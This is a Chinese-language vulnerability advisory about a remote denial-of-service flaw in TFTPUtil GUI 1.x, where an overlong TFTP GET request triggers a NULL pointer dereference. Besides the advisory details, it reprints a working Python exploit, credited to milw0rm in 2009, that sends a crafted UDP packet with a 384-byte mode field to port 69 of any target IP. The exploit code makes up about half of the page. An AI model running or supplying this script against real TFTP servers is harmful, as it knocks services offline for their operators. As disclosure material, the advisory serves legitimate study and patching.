TFTPUtil GET请求拒绝服务漏洞

漏洞起因
设计错误
 
影响系统
TFTPUtil 1.x
 
不受影响系统
 
危害
远程攻击者可以利用漏洞使服务程序崩溃。
 
攻击所需条件
攻击者必须访问TFTPUtil GUI。
 
漏洞信息
TFTPUtil GUI是一款使用TFTP协议提供传送配置文件,固件文件和其他数据类型的应用程序。
TFTPUtil处理TFTP GET请求存在NULL指针引用错误,远程攻击者提交超长的TFTP GET请求可导致服务程序崩溃。
 
测试方法
#!/usr/bin/python
import socket
import sys
from time import *
#Download:http://www.brothersoft.com/tftputil-131537.html
#Note; Good Ramadan For all MuSLimS
if len(sys.argv)!=2:
 print "[x]TFTPUtil GUI 1.3.0 GUI Remote Denial Of Service Exploit"
 print "[x]Author : ThE g0bL!N"
 print "[x]Big Thanx : His0k4\n"
 print "[+]Usage: %s <target_ip>" %sys.argv[0]
 sys.exit(0)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
mode = "\x41"*384
filename = "test"
payload = "\x00\x01" + filename + "\x00" + mode + "\x00"
print "[x] Sending the payload…"
sleep(2)
s.sendto(payload, (sys.argv[1], 69))
print "[x] Done!"
# milw0rm.com [2009-08-26]
 
厂商解决方案
目前没有解决方案提供:
http://sourceforge.net/projects/tftputil/
 
漏洞提供者
ThE g0bL!N

发表评论?

0 条评论。

发表评论